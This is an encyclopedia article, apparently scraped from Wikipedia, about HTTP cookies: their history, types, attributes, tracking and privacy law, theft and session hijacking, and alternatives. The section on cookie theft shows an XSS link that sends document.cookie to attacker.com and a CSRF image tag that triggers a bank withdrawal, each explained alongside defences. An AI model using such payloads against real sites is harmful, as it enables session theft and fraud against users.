Http cookie(from http://en.wikipedia.org/wiki/HTTP_cookie)

HTTP cookie

A cookie
, also known as a web cookie
, browser cookie
, and HTTP cookie
, is a piece of text
stored on a user
's computer by their web browser
. A cookie can be used for authentication
, storing site preferences, shopping cart
contents, the identifier for a server-based session
, or anything else that can be accomplished through storing text data.

A cookie consists of one or more name-value pairs
containing bits of information, which may be encrypted
for information privacy
and data security
purposes. The cookie is sent as a field in the header
of the HTTP response
by a web server
to a web browser
and then sent back unchanged by the browser each time it accesses that server.

Cookies may be set by the server with or without an expiration date.
Cookies without an expiration date exist until the browser terminates,
while cookies with an expiration date may be stored by the browser until
the expiration date passes. Users may also manually delete cookies in
order to save space or to address privacy issues.

As text, cookies are not executable
. Because they are not executed, they cannot replicate themselves and are not viruses
. However, due to the browser mechanism to set and read cookies, they can be used as spyware
(see zombie cookie
and evercookie
for more details). Anti-spyware products may warn users about some
cookies because cookies can be used to track computer activity—a privacy
concern, later causing possible malware
.

Most modern browsers allow users to decide whether to accept cookies,
and the time frame to keep them, but rejecting cookies makes some
websites unusable.

Contents [hide ] 1 History 2 Terminologies 2.1 Session cookie 2.2 Persistent cookie 2.3 Secure cookie 2.4 HttpOnly cookie 2.5 Third-party cookie 2.6 Super cookie 2.7 Zombie cookie 3 Uses 3.1 Session management 3.2 Personalization 3.3 Tracking 4 Implementation 4.1 Setting a cookie 4.2 Cookie attributes 4.2.1 Domain and Path 4.2.2 Expires and Max-Age 4.2.3 Secure and HttpOnly 5 Misconceptions 6 Browser settings 7 Privacy and third-party cookies 8 Cookie theft and session hijacking 8.1 Network eavesdropping 8.2 Publishing false sub-domain – DNS cache poisoning 8.3 Cross-site scripting – cookie theft 8.4 Cross-site scripting – just do it 8.5 Cross-site scripting – proxy request 8.6 Cross-site Request Forgery 9 Drawbacks of cookies 9.1 Inaccurate identification 9.2 Inconsistent state on client and server 10 Alternatives to cookies 10.1 IP address 10.2 URL (query string) 10.3 Hidden form fields 10.4 window.name 10.5 HTTP authentication 10.6 Adobe Flash Local Shared Objects 10.7 Client-side persistence 11 See also 12 References 13 External links

History

The term "cookie" was derived from "magic cookie
",
which is a packet of data a program receives and sends again unchanged.
Magic cookies were already used in computing when computer programmer Lou Montulli
had the idea of using them in Web communications in June 1994.[
1]

At the time, he was an employee of Netscape Communications
, which was developing an e-commerce
application for a customer. Cookies provided a solution to the problem of reliably implementing a virtual shopping cart
.[
2]

[
3]

Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of Mosaic Netscape
, released on October 13, 1994,[
4]

[
5]

supported cookies. The first use of cookies (out of the labs) was
checking whether visitors to the Netscape website had already visited
the site. Montulli applied for a patent for the cookie technology in
1995, and US 5774670

was granted in 1998. Support for cookies was integrated in Internet Explorer in version 2, released in October 1995.[
6]

The introduction of cookies was not widely known to the public at the
time. In particular, cookies were accepted by default, and users were
not notified of the presence of cookies. Some people were aware of the
existence of cookies as early as the first quarter of 1995,[
7]

but the general public learned about them after the Financial Times

published an article about them on February 12, 1996. In the same year,
cookies received a lot of media attention, especially because of
potential privacy implications. Cookies were discussed in two U.S.
Federal Trade Commission
hearings in 1996 and 1997.

The development of the formal cookie specifications was already
ongoing. In particular, the first discussions about a formal
specification started in April 1995 on the www-talk mailing list. A
special working group within the IETF
was formed. Two alternative proposals for introducing state in HTTP
transactions had been proposed by Brian Behlendorf and David Kristol
respectively, but the group, headed by Kristol himself, soon decided to
use the Netscape specification as a starting point. On February 1996,
the working group identified third-party cookies as a considerable
privacy threat. The specification produced by the group was eventually
published as RFC 2109
in February 1997. It specifies that third-party cookies were either not allowed at all, or at least not enabled by default.

At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109
was not followed by Netscape and Internet Explorer. RFC 2109
was superseded by RFC 2965
in October 2000.

Terminologies

Session cookie

A session cookie only lasts for the duration of users using the
website. A session cookie will expire if a user closes his/her browser,
or if a user hasn't visited the server for certain period of time
(called session idle timeout), and the server would expire/invalidate
the user session.

Persistent cookie

A persistent cookie will outlast user sessions. If a persistent
cookie has Max-Age set to 1 year, then, within the year, the initial
value set in that cookie would be sent back to server every time the
user is visiting the server. This could be used to record a vital piece
of information such as how the user initially came to this website. For
this reason, persistent cookie is also called tracking cookie.

Secure cookie

A secure cookie is only used when a browser is visiting a server via
HTTPS, that will make sure that cookie is always encrypted when
transmitting from client to server, and therefore less likely to be
exposed to cookie theft via eavesdropping.

[edit
]
HttpOnly cookie

HttpOnly cookie is still in IETF draft[
8]

,
though most of the modern browsers support it. On a supported browser, a
HttpOnly cookie will only be used when transmitting HTTP (or HTTPS)
requests, but the cookie value is not available to client side script,
hence mitigate the threat of cookie theft via Cross-site scripting
.

Third-party cookie

First-party cookies are cookies set with the same domain or its
subdomain in your browser's address bar. Third-party cookies are cookies
being set with different domains than the one shown on address bar.

For example: Suppose a user visits

www.example1.com

, it sets a cookie with domain

ad.foxytracking.com

. When the user later visits

www.example2.com

, another cookie is placed with domain

ad.foxytracking.com

,
eventually these cookies will be sent to the advertiser when loading
their ads or visiting their website, the advertiser can then build up
users' browsing history across all the websites this advertiser has
footprints on.

See Privacy and Third-party cookies

below for more.

Super cookie

A Super cookie is a cookie with a Public Suffix [
9]

domain, like

.com

,

.co.uk

or

k12.ca.us

.

Most browsers, by default, allow first-party cookies, i.e., a cookie
with domain to be the same or sub-domain of the requesting host. For
example, a user visiting

www.example.com

can have a cookie set with domain

www.example.com

or

.example.com

, but not

.com

. A super cookie with domain

.com

would be blocked by browsers; otherwise,

attacker.com

could set a super cookie with domain

.com

and potentially disrupt or impersonate legitimate user requests to

example.com

.
Unfortunately, the Public Suffix List keeps changing, and older
versions of browsers will not have the most up-to-date list, and will
therefore be vulnerable to certain super cookies.

Zombie cookie

Main article: Zombie cookie

A zombie cookie is any cookie that is automatically recreated after a
user has deleted it. This is accomplished by a script storing the
content of the cookie in some other location, such as the local storage
available to Flash content, and then recreating it from the backup when
the cookie's absence is detected.

Uses

Session management

Cookies may be used to maintain data related to the user during
navigation, possibly across multiple visits. Cookies were introduced to
provide a way to implement a "shopping cart
" (or "shopping basket"),[
2]

[
3]

a virtual device into which users can store items they want to purchase as they navigate throughout the site.

Shopping basket applications today usually store the list of basket
contents in a database on the server side, rather than storing basket
items in the cookie itself. A web server typically sends a cookie
containing a unique session identifier
.
The web browser will send back that session identifier with each
subsequent request and shopping basket items are stored associated with a
unique session identifier.

Allowing users to log in to a website is a frequent use of cookies.
Typically the web server will first send a cookie containing a unique
session identifier. Users then submit their credentials and the web
application authenticates the session and allows the user access to
services.

Personalization

Cookies may be used to remember the information about the user who
has visited a website in order to show relevant content in the future.
For example a web server may send a cookie containing the username last
used to log in to a web site so that it may be filled in for future
visits.

Many websites use cookies for personalization
based on users' preferences. Users select their preferences by entering
them in a web form and submitting the form to the server. The server
encodes the preferences in a cookie and sends the cookie back to the
browser. This way, every time the user accesses a page, the server is
also sent the cookie where the preferences are stored, and can
personalize the page according to the user preferences. For example, the
Wikipedia
website allows authenticated users to choose the webpage skin
they like best; the Google
search engine allows users (even non-registered ones) to decide how many search results per page they want to see.

Tracking

Tracking cookies may be used to track internet users' web browsing habits. This can also be done in part by using the IP address
of the computer requesting the page or the referrer
field of the HTTP request header
, but cookies allow for greater precision. This can be demonstrated as follows:

If the user requests a page of the site, but the request contains no
cookie, the server presumes that this is the first page visited by the
user; the server creates a random string and sends it as a cookie back
to the browser together with the requested page;

From this point on, the cookie will be automatically sent by the
browser to the server every time a new page from the site is requested;
the server sends the page as usual, but also stores the URL of the
requested page, the date/time of the request, and the cookie in a log
file.

By looking at the log file, it is then possible to find out which pages the user has visited and in what sequence.

Implementation

A possible interaction between a Web browser and a server holding a Web
page, in which the server sends a cookie to the browser and the browser
sends it back when requesting another page.

Cookies are arbitrary pieces of data chosen by the Web server
and sent to the browser. The browser returns them unchanged to the server, introducing a state
(memory of previous events) into otherwise stateless HTTP transactions. Without cookies, each retrieval of a Web page
or component of a Web page is an isolated event, mostly unrelated to
all other views of the pages of the same site. Other than being set by a
web server, cookies can also be set by a script
in a language such as JavaScript
, if supported and enabled by the Web browser.

Cookie specifications[
10]

[
11]

[
8]

suggest that browsers should be able to save and send back a minimal
number of cookies. In particular, an internet browser is expected to be
able to store at least 300 cookies of four kilobytes
each, and at least 20 cookies per server or domain
.

Setting a cookie

Transfer of Web pages follows the HyperText Transfer Protocol
(HTTP). Regardless of cookies, browsers request a page from web servers by sending them a usually short text called HTTP request
.
For example, to access the page http://www.example.org/index.html, browsers connect to the server www.example.org sending it a request that
looks like the following one:

	GET /index.html HTTP/1.1 Host: www.example.org
browser	-------→	server

The server replies by sending the requested page preceded by a similar packet of text, called 'HTTP response'
. This packet may contain lines requesting the browser to store cookies:

	HTTP/1.1 200 OK Content-type: text/html Set-Cookie: name=value Set-Cookie: name2=value2; Expires=Wed, 09 Jun 2021 10:18:14 GMT (content of page)
browser	←-------	server

The server sends lines of

Set-Cookie

only if the server wishes the browser to store cookies.

Set-Cookie

is a directive for the browser to store the cookie and send it back in
future requests to the server (subject to expiration time or other cookie attributes
),
if the browser supports cookies and cookies are enabled. For example,
the browser requests the page http://www.example.org/spec.html by
sending the server www.example.org a request like the following:

	GET /spec.html HTTP/1.1 Host: www.example.org Cookie: name=value; name2=value2 Accept: */*
browser	-------→	server

This is a request for another page from the same server, and differs
from the first one above because it contains the string that the server
has previously sent to the browser. This way, the server knows that this
request is related to the previous one. The server answers by sending
the requested page, possibly adding other cookies as well.

The value of a cookie can be modified by the server by sending a new

Set-Cookie: name=newvalue

line in response of a page request. The browser then replaces the old value with the new one.

The term "cookie crumb" is sometimes used to refer to the name-value pair.[
12]

This is not the same as breadcrumb web navigation
,
which is the technique of showing in each page the list of pages the
user has previously visited; this technique, however, may be implemented
using cookies.

Cookies can also be set by JavaScript or similar scripts running within the browser. In JavaScript, the object

document.cookie

is used for this purpose. For example, the instruction

document.cookie = "temperature=20"

creates a cookie of name

temperature

and value

20

.[
13]

Cookie attributes

Besides the name-value pair, servers can also set these cookie
attributes: a cookie domain, a path, expiration time or maximum age,
secure flag and httponly flag. Browsers will not send cookie attributes
back to the server. They will only send the cookie’s name-value pair.
Cookie attributes are used by browsers to determine when to delete a
cookie, block a cookie or whether to send a cookie (name-value pair) to
the servers.

Domain and Path

The cookie domain and path define the scope of the cookie, they tell
the browser that cookies should only be sent back to the server for the
given domain and path. If not specified, they default to the domain and
path of the object that was requested. An example of Set-Cookie
directives from a website after a user logged in:

Set-Cookie: LSID=DQAAAK…Eaem_vYg; Path=/accounts; Expires=Wed, 13-Jan-2021 22:23:01 GMT; Secure; HttpOnly Set-Cookie: HSID=AYQEVn….DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-2021 22:23:01 GMT; HttpOnly Set-Cookie: SSID=Ap4P….GTEq; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-2021 22:23:01 GMT; Secure; HttpOnly ......

The first cookie

LSID

has default Domain

docs.foo.com

and Path

/accounts

, which tells browser to use the cookie only when requesting pages contained in

docs.foo.com/accounts

; the other 2 cookies

HSID

and

SSID

would be sent back by browsers while requesting any subdomain in

.foo.com

on any path, for example

www.foo.com/

.

Expires and Max-Age

The Expires directive tells the browser when to delete the cookie. It
is specified in the form of “Wdy, DD-Mon-YYYY HH:MM:SS GMT”, indicating
the exact date/time this cookie will expire. As an alternative to
setting cookie expiration as an absolute date/time, RFC 2965
allows the use of Max-Age attribute to set the cookie’s expiration as
an interval of seconds in the future, relative to the time the browser
received the cookie. An example of Set-Cookie directives from a website
after a user logged in:

Set-Cookie: lu=Rg3vHJZnehYLjVg7qi3bZjzg; expires=Tue, 15-Jan-2013 21:47:38 GMT; path=/; domain=.foo.com; httponly Set-Cookie: made_write_conn=1295214458; path=/; domain=.foo.com Set-Cookie: reg_fb_gate=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.foo.com; httponly ......

The first cookie

lu

is set to expire sometime in 15-Jan-2013, it will be used by the client browser until that time; the second cookie

made_write_conn

does not have expiration date, it is a session cookie, it will be
deleted after the user closes his/her browser; the third cookie

reg_fb_gate

has its value changed to deleted
,
with an expiration time in the past, the browser will delete this
cookie right away – note that cookie will only be deleted when the
domain and path attributes in the

Set-Cookie

field match the values used when the cookie was created.

Secure and HttpOnly

Secure and HttpOnly attributes do not have a value field. The
existence of the attribute tells the browser whether the cookie is
secure or httponly.

A Secure attribute tells the browser to only use this cookie via secure/encrypted
connections, obviously, web servers should also set this cookie via secure channels
, and therefore anyone eavesdropping your communication would not pick up the cookie.

An HttpOnly attribute tells the browser to only use the cookie for
HTTP protocol, the cookie is not visible to client side scripts, and
therefore cannot be stolen via cross-site scripting
(a pervasive attack vector [
14]

). As shown in previous examples, both Facebook and Google use HttpOnly attribute extensively.

Misconceptions

Since their introduction on the Internet, misconceptions about cookies have circulated on the Internet and in the media.[
15]

[
16]

In 1998, CIAC
, a computer incident response team of the United States Department of Energy
,
found the security vulnerability "essentially nonexistent" and
explained that "information about where you come from and what web pages
you visit already exists in a web server's log files".[
17]

In 2005, Jupiter Research
published the results of a survey,[
18]

according to which a consistent percentage of respondents believed some of the following false
claims:

The following are false
:

Cookies are like viruses
in that they can infect the user's hard disks

Cookies generate pop-ups

Cookies are used for spamming

Cookies are used only for advertising

According to the same survey, a large percentage of Internet users do not know how to delete cookies.

Cookies cannot erase or read arbitrary information from the user's computer.[
19]

However, cookies allow for detecting the Web pages viewed by a user on a given site or set of sites.

Browser settings

Most modern browsers support cookies and allow the user to disable them. The following are common options:[
20]

To enable or disable cookies completely, so that they are always accepted or always blocked.

To allow the user to see the cookies that are active with respect to a given page by typing

javascript:alert(document.cookie)

in the browser URL
field. Some browsers incorporate a cookie manager for the user to see
and selectively delete the cookies currently stored in the browser.

By default, Internet Explorer allows only 3rd party cookies that are accompanied by a P3P
"CP" (Compact Policy) field.[
21]

Most browsers also allow a full wipe of private data including cookies. Add-on tools for managing cookie permissions also exist.[
22]

[
23]

[
24]

[
25]

Privacy and third-party cookies

Cookies have some important implications on the privacy
and anonymity
of Web users. While cookies are sent only to the server setting them or the server in the same Internet domain
,
a Web page may contain images or other components stored on servers in
other domains. Cookies that are set during retrieval of these components
are called third-party cookies
. The standards for cookies, RFC 2109
and RFC 2965
, specify that browsers should protect user privacy and not allow third-party cookies by default. But most browsers, such as Mozilla Firefox
, Internet Explorer
, Opera
and Google Chrome
do allow third-party cookies by default, as long as the third-party website has Compact Privacy Policy
published.





In this fictional example, an advertising company has placed banners in
two Web sites. Hosting the banner images on its servers and using
third-party cookies, the advertising company is able to track the
browsing of users across these two sites.

Advertising companies use third-party cookies to track a user across
multiple sites. In particular, an advertising company can track a user
across all pages where it has placed advertising images or web bugs
.
Knowledge of the pages visited by a user allows the advertising company
to target advertisements to the user's presumed preferences.

Website operators who do not disclose third-party cookie use to
consumer run the risk of harming consumer trust if cookie use is
discovered. Having clear disclosure (such as in a privacy policy) tends
to eliminate any negative effects of such cookie discovery.[
26]

The possibility of building a profile of users is considered by some a
potential privacy threat, especially when tracking is done across
multiple domains using third-party cookies. For this reason, some
countries have legislation about cookies.

The United States
government has set strict rules on setting cookies in 2000 after it was disclosed that the White House drug policy office
used cookies to track computer users viewing its online anti-drug
advertising. In 2002, privacy activist Daniel Brandt found that the CIA
had been leaving persistent cookies on computers which had visited its
web site. When notified it was violating policy, CIA stated that these
cookies were not intentionally set and stopped setting them.[
27]

On December 25, 2005, Brandt discovered that the National Security Agency
had been leaving two persistent cookies on visitors' computers due to a
software upgrade. After being informed, the National Security Agency
immediately disabled the cookies.[
28]

The 2002 European Union telecommunication privacy Directive contains rules about the use of cookies.[
29]

In particular, Article 5, Paragraph 3 of this directive mandates that
storing data (like cookies) in a user's computer can only be done if:

the user is provided information about how this data is used;

the user is given the possibility of denying this storing operation.
However, this article also states that storing data that is necessary
for technical reasons is exempted from this rule. This directive was
expected to have been applied since October 2003, but a December 2004 report
says (page 38) that this provision was not applied in practice, and that some member countries (Slovakia
, Latvia
, Greece
, Belgium
, and Luxembourg
) did not even implement the provision in national law
. The same report suggests a thorough analysis of the situation in the Member States.

The P3P
specification
includes the possibility for a server to state a privacy policy, which
specifies which kind of information it collects and for which purpose.
These policies include (but are not limited to) the use of information
gathered using cookies. According to the P3P specification, a browser
can accept or reject cookies by comparing the privacy policy with the
stored user preferences or ask the user, presenting them the privacy
policy as declared by the server.

Many web browsers including Apple's Safari and Microsoft Internet
Explorer versions 6 and 7 support P3P which allows the web browser to
determine whether to allow 3rd party cookies to be stored. The Opera web
browser allows users to refuse third-party cookies and to create global
and specific security profiles for Internet domains.[
30]

Firefox 2.x dropped this option from its menu system but it restored it with the release of version 3.x.[
31]

Third-party cookies can be blocked by most browsers to increase
privacy and reduce tracking by advertising and tracking companies
without negatively affecting the user's Web experience.[
32]

Many advertising operators have an opt-out option to behavioural
advertising, with a generic cookie in the browser stopping behavioural
advertising.[
33]

Cookie theft and session hijacking

Most websites use cookies as the only identifiers for user sessions –
the alternatives of identifying web users other than using cookies have
their own limitations and vulnerabilities. For the websites using
cookies as session identifiers, attackers can impersonate users’
requests if they have stolen a full set of victims’ cookies. From web
server point of view, a request from attacker will have the same
authentication as the victim’s and hence is performed on behalf of
victim’s session, with that, victim’s session is hijacked.

Below explains various scenarios of cookie theft and user session
hijacking (even without stealing user cookies), for websites that rely
solely on HTTP Cookies for user identifications.

Network eavesdropping

A cookie can be stolen by another computer that is allowed reading from the network

Traffic on a network can be intercepted and read by computers on the
network other than its sender and its receiver (particularly over unencrypted
open Wi-Fi
). This traffic includes cookies sent on ordinary unencrypted HTTP
sessions. Where network traffic is not encrypted, attackers can
therefore read the communications of other users on the network,
including HTTP cookies as well as the entire contents of the
conversations.

So if the attackers wanted more than just eavesdropping, they could
use harvested cookies, impersonate a user to perform a malicious task,
like transfer money out of victim’s account.

This issue can be resolved by securing the communication between the user's computer and the server by employing Transport Layer Security
(HTTPS
protocol) to encrypt the connection. A server can specify the Secure
flag while setting a cookie; the browser will only send it over an encrypted channel, such as an SSL connection.[
34]

Publishing false sub-domain – DNS cache poisoning

Via DNS cache poisoning
, an attacker might be able to make a DNS server to cache a fabricated DNS entry, say

f12345.www.example.com

with attacker’s server IP address. And then, the attacker can post an image URL from his own server (for example,

http://f12345.www.example.com/img_4_cookie.jpg

). Victims reading attacker’s message, would download this image from

f12345.www.example.com

. Since

f12345.www.example.com

is a sub-domain of

www.example.com

, victims’ browsers would submit all

example.com

related cookies to the attacker’s server; the compromised cookies would also include HttpOnly
cookies.

This vulnerability is usually for Internet Service Providers
to fix, by securing their DNS servers. But it can also be mitigated if

www.example.com

is using Secure
cookies. Victims’ browsers will not submit Secure
cookies if the attacker’s image is not using encrypted connections. If attacker chose to use HTTPS
for his img_4_cookie.jpg download, he would have the challenge of obtaining an SSL certificate for

f12345.www.example.com

from a Certificate Authority
.
Without proper SSL certificate, victims’ browser would display (usually
very visible) warning messages about the invalid certificate, hence
alert victims and probably the security officials from

www.example.com

.

Cross-site scripting
– cookie theft

Cross-site scripting: a cookie that should be only exchanged between a server and a client is sent to another party.

Scripting languages such as JavaScript
and JScript
are usually allowed to access cookie values and have some means to send
arbitrary values to arbitrary servers on the Internet. These facts are
used in combination with sites allowing users to post HTML content that
other users can see.

As an example, an attacker may post a message on

www.example.com

with the following link:

<a href="#" onclick="window.location='http://attacker.com/stole.cgi?text='+escape(document.cookie); return false;">Click here!</a>

[/code]
When another user clicks on this link, the browser executes the piece of code within the

onclick

attribute, thus replacing the string

document.cookie

with the list of cookies of the user that are active for the page. As a result, this list of cookies is sent to the

attacker.com

server. If the attacker’s posting is on

https://www.example.com/somewhere

, secure cookies will also be sent to attacker.com in plain text.

Cross-site scripting is a constant threat, as there are always some
crackers trying to find a way of slipping in script tags to websites. It
is the responsibility of website development to filter out such
malicious code.

In the mean time, such attacks can be mitigated by using HttpOnly
cookies. These cookies will not be accessible by client side script,
and therefore the attacker will not be able to gather these cookies.

Cross-site scripting
– just do it

If an attacker was able to insert a piece of script to a page on

www.example.com

,
and a victim’s browser was able to execute the script, the script could
simply do the attack. This attack would use victim’s browser to send
HTTP requests to servers directly, therefore, victim’s browser would
submit all relevant cookies, including HttpOnly
cookies, as well as Secure
cookies if the script request is on HTTPS
.

For example, on MySpace, Samy posted a short message “Samy is my
hero” on his profile, with a hidden script to send Samy “friend request”
and then post the same message on victim’s profile. A user reading
Samy’s profile would send Samy “friend request” and post the same
message on this person’s profile. Then, the third person reading second
person’s profile would do the same. Pretty soon, this Samy worm
became one of the fastest spreading viruses of all time.

This type of attack (with automated scripts) would not work if a website had CAPTCHA
to challenge client requests.

Cross-site scripting – proxy request

In older version of browsers, there were security holes allowing attackers to script a proxy request by using XMLHttpRequest
. For example, a victim is reading an attacker’s posting on

www.example.com

, and the attacker’s script is executed in victim’s browser, the script generates a request to

www.example.com

with proxy server

attacker.com

. Since the request is for

www.example.com

, all

example.com

cookies will be sent along with the request, but routed through
attacker’s proxy server, hence, the attacker can harvest victim’s
cookies.

This attack would not work for Secure
cookie, since Secure
cookies go with HTTPS
connections, and its protocol dictates end-to-end encryption, i.e., the
information is encrypted on user’s browser and decrypted on the
destination server

www.example.com

, so the proxy servers would only see encrypted bits and bytes.

Cross-site Request Forgery

Main article: Cross-site request forgery

For example, Bob might be browsing a chat forum where another user,
Mallory, has posted a message. Suppose that Mallory has crafted an HTML
image element that references an action on Bob's bank's website (rather
than an image file), e.g.,

<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">

[/code]
If Bob's bank keeps his authentication information in a cookie, and
if the cookie hasn't expired, then the attempt by Bob's browser to load
the image will submit the withdrawal form with his cookie, thus
authorizing a transaction without Bob's approval.

Drawbacks of cookies

Besides privacy concerns, cookies also have some technical drawbacks.
In particular, they do not always accurately identify users, they can
be used for security attacks, and they are often at odds with the
Representational State Transfer (REST
) software architectural style.[
35]

[
36]

Inaccurate identification

If more than one browser is used on a computer, each usually has a
separate storage area for cookies. Hence cookies do not identify a
person, but a combination of a user account, a computer, and a Web
browser. Thus, anyone who uses multiple accounts, computers, or browsers
has multiple sets of cookies.

Likewise, cookies do not differentiate between multiple users who share the same user account
, computer, and browser.

Inconsistent state on client and server

The use of cookies may generate an inconsistency between the state of
the client and the state as stored in the cookie. If the user acquires a
cookie and then clicks the "Back" button of the browser, the state on
the browser is generally not the same as before that acquisition. As an
example, if the shopping cart of an online shop is built using cookies,
the content of the cart may not change when the user goes back in the
browser's history: if the user presses a button to add an item in the
shopping cart and then clicks on the "Back" button, the item remains in
the shopping cart. This might not be the intention of the user, who
possibly wanted to undo the addition of the item. This can lead to
unreliability, confusion, and bugs. Web developers should therefore be
aware of this issue and implement measures to handle such situations as
this.

Alternatives to cookies

Some of the operations that can be done using cookies can also be done using other mechanisms.

IP address

Users may be tracked based on the IP address
of the computer requesting the page. This technique has been available
since the introduction of the World Wide Web, as downloading pages
requires the server to know the IP address of the computer running the
browser or the proxy
,
if any is used. The server can track this information whether or not
cookies are used. However, these addresses are typically less reliable
in identifying a user than cookies because computers and proxies may be
shared by several users, and the same computer may be assigned different
IP addresses in different work sessions (as is often the case for dial-up
connections).

Tracking by IP addresses can be reliable in some situations, such as
the case of always-on broadband connections which retain the same IP
address for long periods of time, so long as the power stays on.

Some systems such as Tor
are designed to retain Internet anonymity
and make tracking by IP address impractical or impossible.

IP addresses are in certain jurisdictions treated as Personally identifiable information
and as such subject to use under legal restrictions.

URL (query string)

A more precise technique is based on embedding information into URLs. The query string
part of the URL
is the one that is typically used for this purpose, but other parts can be used as well. The Java Servlet
and PHP
session mechanisms both use this method if cookies are not enabled.

This method consists of the Web server appending query strings to the
links of a Web page it holds when sending it to a browser. When the
user follows a link, the browser returns the attached query string to
the server.

Query strings used in this way and cookies are very similar, both
being arbitrary pieces of information chosen by the server and sent back
by the browser. However, there are some differences: since a query
string is part of a URL, if that URL is later reused, the same attached
piece of information is sent to the server. For example, if the
preferences of a user are encoded in the query string of a URL and the
user sends this URL to another user by e-mail
, those preferences will be used for that other user as well.

Moreover, even if the same user accesses the same page two times,
there is no guarantee that the same query string is used in both views.
For example, if the same user arrives to the same page but coming from a
page internal to the site the first time and from an external search engine
the second time, the relative query strings are typically different while the cookies would be the same. For more details, see query string
.

Other drawbacks of query strings are related to security: storing
data that identifies a session in a query string enables or simplifies session fixation
attacks, referrer
logging attacks and other security exploits
. Transferring session identifiers as HTTP cookies is more secure.

Hidden form fields

Another form of session tracking is to use web forms
with hidden fields. This technique is very similar to using URL query
strings to hold the information and has many of the same advantages and
drawbacks; and if the form is handled with the HTTP
GET method, the fields actually become part of the URL the browser will
send upon form submission. But most forms are handled with HTTP POST,
which causes the form information, including the hidden fields, to be
appended as extra input that is neither part of the URL, nor of a
cookie.

This approach presents two advantages from the point of view of the
tracker: first, having the tracking information placed in the HTML
source and POST input rather than in the URL means it will not be
noticed by the average user; second, the session information is not
copied when the user copies the URL (to save the page on disk or send it
via email, for example).

This method can be easily used with any framework that supports web forms.

window.name

All current web browsers can store a fairly large amount of data (2-32 MB) via JavaScript using the DOM
property window.name. This data can be used instead of session cookies
and is also cross-domain. The technique can be coupled with JSON
/JavaScript objects to store complex sets of session variables[
37]

on the client side.

The downside is that every separate window or tab
will initially have an empty window.name
; in times of tabbed browsing
this means that individually opened tabs (initiation by user)
will not have a window name. Furthermore window.name
can be used for tracking visitors across different web sites, making it of concern for Internet privacy
.

In some respects this can be more secure than cookies due to not involving the server, so it is not vulnerable to network
cookie sniffing attacks. However if special measures are not taken to
protect the data, it is vulnerable to other attacks because the data is
available across different web sites opened in the same window or tab.

HTTP authentication

The HTTP protocol includes the basic access authentication
and the digest access authentication
protocols, which allow access to a Web page only when the user has
provided the correct username and password. If the server requires such
credentials for granting access to a web page, the browser requests them
from the user and, once obtained, the browser stores and sends them in
every subsequent pages request. This information can be used to track
the user.

Adobe Flash Local Shared Objects

If a browser includes the Adobe Flash Player
plugin
(formerly developed by Macromedia
), the Local Shared Objects
(“flash cookies”) functionality can be used in a way very similar to
cookies. Local Shared Objects may be an attractive choice to web
developers because a majority of Windows
users have Flash Player installed, the default size limit is 100 kB,
and the security controls are distinct from the user controls for
cookies, so Local Stored Objects may be enabled when cookies are not.

In some cases, web sites have created Flash LSOs that behave
differently than what a user specifies for his http cookies, which has
raised concern that web sites need to specify a consistent privacy
policy across different types of cookies.[
38]

The major drawback with this approach is the same as every platform/vendor-specific approach: it breaks the web's global accessibility
and interoperability
, tying up web development to a specific client's platform, excluding users who use standards-compliant
web user agents
and instead forcing them to use platform/vendor-specific web agents, which perpetuates vendor lock-in
.

HTML5 that has many of the same functionalities as Flash and that is
gradually being implemented on the web fixes some of the long-standing
problems with the Flash platform by making many aspects of Flash
functionality available via standard web interfaces.

Client-side persistence

Some web browsers support a script-based persistence mechanism that
allows the page to store information locally for later retrieval.
Internet Explorer, for example, supports persisting information in the
browser's history, in favorites, in an XML store, or directly within a
Web page saved to disk.[
39]

With HTML 5
there will be a DOM Storage (localStorage)
method, currently supported by only some browsers. For Internet Explorer
5+ there is a userdata method[
40]

available through DHTML Behaviours
.

A different mechanism relies on browsers normally caching (holding in
memory instead of reloading) JavaScript programs used in web pages. As
an example, a page may contain a link such as

<script type="text/javascript" src="example.js">

. The first time this page is loaded, the program

example.js

is loaded as well. At this point, the program remains cached and is not
reloaded the second time the page is visited. As a result, if this
program contains a statement such as

id=3243242

(global
variable), this identifier remains valid and can be exploited by other
JavaScript code the next times the page is loaded, or another page
linking the same program is loaded.[citation needed

]
The major drawback of this method is that the global JavaScript
variable must be final, meaning that it cannot be changed or deleted
persistently like a cookie.